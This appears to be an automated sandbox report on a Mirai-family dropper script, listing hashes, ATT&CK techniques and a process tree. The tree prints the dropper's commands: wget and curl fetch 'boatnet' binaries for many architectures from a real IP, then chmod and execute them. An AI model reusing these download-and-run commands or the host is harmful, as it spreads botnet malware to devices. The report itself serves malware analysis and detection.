Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-12-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
e0ccd217979419469e913cbef10872f3
-
SHA1
6bbef022dcf450af81bee90522e4c82069c84064
-
SHA256
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
-
SHA512
38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 694 chmod 864 chmod 761 chmod 774 chmod 846 chmod 852 chmod 787 chmod 826 chmod 840 chmod 834 chmod 858 chmod 683 chmod 747 chmod 796 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/WTF 684 WTF /tmp/WTF 695 WTF /tmp/WTF 749 WTF /tmp/WTF 762 WTF /tmp/WTF 776 WTF /tmp/WTF 788 WTF /tmp/WTF 797 WTF /tmp/WTF 827 WTF /tmp/WTF 835 WTF /tmp/WTF 841 WTF /tmp/WTF 847 WTF /tmp/WTF 853 WTF /tmp/WTF 859 WTF /tmp/WTF 865 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/590/cmdline WTF File opened for reading /proc/606/cmdline WTF File opened for reading /proc/655/cmdline WTF File opened for reading /proc/809/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTF File opened for reading /proc/869/cmdline WTF File opened for reading /proc/830/cmdline WTF File opened for reading /proc/867/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/660/cmdline WTF File opened for reading /proc/870/cmdline WTF File opened for reading /proc/871/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/654/cmdline WTF File opened for reading /proc/823/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/611/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/653/cmdline WTF File opened for reading /proc/656/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/608/cmdline WTF File opened for reading /proc/610/cmdline WTF File opened for reading /proc/873/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/875/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 691 curl 693 cat 687 wget -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:656 -
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/catcat boatnet.x862⤵PID:681
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:684
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:687
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:691
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:693
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:695
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:697
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat boatnet.arc2⤵PID:746
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:749
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:752
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/catcat boatnet.i4682⤵PID:760
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:763
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/catcat boatnet.i6862⤵PID:773
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:777
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/catcat boatnet.x86_642⤵PID:785
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat boatnet.mpsl2⤵PID:795
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-VErtWR WTF2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:797
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:799
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
PID:824
-
-
/bin/catcat boatnet.arm2⤵PID:825
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:827
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵PID:831
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:832
-
-
/bin/catcat boatnet.arm52⤵PID:833
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:835
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵PID:837
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:838
-
-
/bin/catcat boatnet.arm62⤵PID:839
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:841
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵PID:843
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:844
-
-
/bin/catcat boatnet.arm72⤵PID:845
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:847
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵PID:849
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:850
-
-
/bin/catcat boatnet.ppc2⤵PID:851
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:853
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵PID:855
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:856
-
-
/bin/catcat boatnet.spc2⤵PID:857
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:859
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵PID:861
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:862
-
-
/bin/catcat boatnet.m68k2⤵PID:863
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:865
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵PID:867
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5366837c461677cb1b37924604fe50564
SHA1ce442f4c57322b7dbafcaebd37cb0ee531d0ea4d
SHA256c28510d75f73788f786fb0e5f14f3b7d6e349e0eeaa5922c6743be66824b4c4f
SHA5124434b96a2931b0bbf39863cecd0c924e64e8d051b9277ae7a86ed151d60bdebfaf2f7b749ec6cad8a41000a3acb268adaea9f42868f5617a52f8053efad79840
-
Filesize
105KB
MD597a63a655202fc4ceb0f4a4957711dd4
SHA1ea5a84a5b260cacd1107e9bc05351ec52895e938
SHA2566d13de91a88aac152d7aeffedecc20414ed86d1c6cc58b5cc2bc7a439c57f620
SHA512d5463c0d4274bd6de9ea25d5ebd99afce000b2e3afad63099176ba49a7c80972244b259b3b438277acb997d3b612e52f5eaa998da2db0ea87daddd3e203b0a89
-
Filesize
232B
MD57dfb9a4219d20c6babc4877451844e3c
SHA18b56a18d01c00f757df29faeb95b2711ecd3cd18
SHA2569177a352dcbf8875ebb2e22e682760d47faa4d77398add153dd7084e7568c5bc
SHA5127355451c27cd2fe7e03af772a8911fff879e64b04c8e002d4335ff890957a04e611e444131ddab6e171e0a21a72cbbe75f9b5cc338a72d2d24ec6d71d59998c9
-
Filesize
24KB
MD587b8771a708088e3398efb2966205acc
SHA1a33d662cad4025f6ee07f8432dd760e1bc3d31a5
SHA25673b739b663e3df9052b243a8acc69675ee8a423bfaf4baeb1b246182e70b18c6
SHA512d65a0254aa6ca4a9063a3245de02f92f324680c0b31020811841f4257fd2f09df1361abfee820f83b2d7d3d96588f9d1746a12ea207de92157632fd9daa98f31
-
Filesize
20KB
MD5cfdee595514f89c9e1ca4c3c26837bb6
SHA1726f957189f0ce2da9008987aaa7f51453ede884
SHA2564940c3107a34d4b65f81e5e5e7a54f31fce9417fe74d18dd6e6b104d07197a3d
SHA51207cd565d04eeef92d3bf0613413d2c63bc045d6093bb048118b3f80254701c9aaef7dac444dc39ced7c2297754d7dbe1da4f808a6e2e87727f9272b436fea226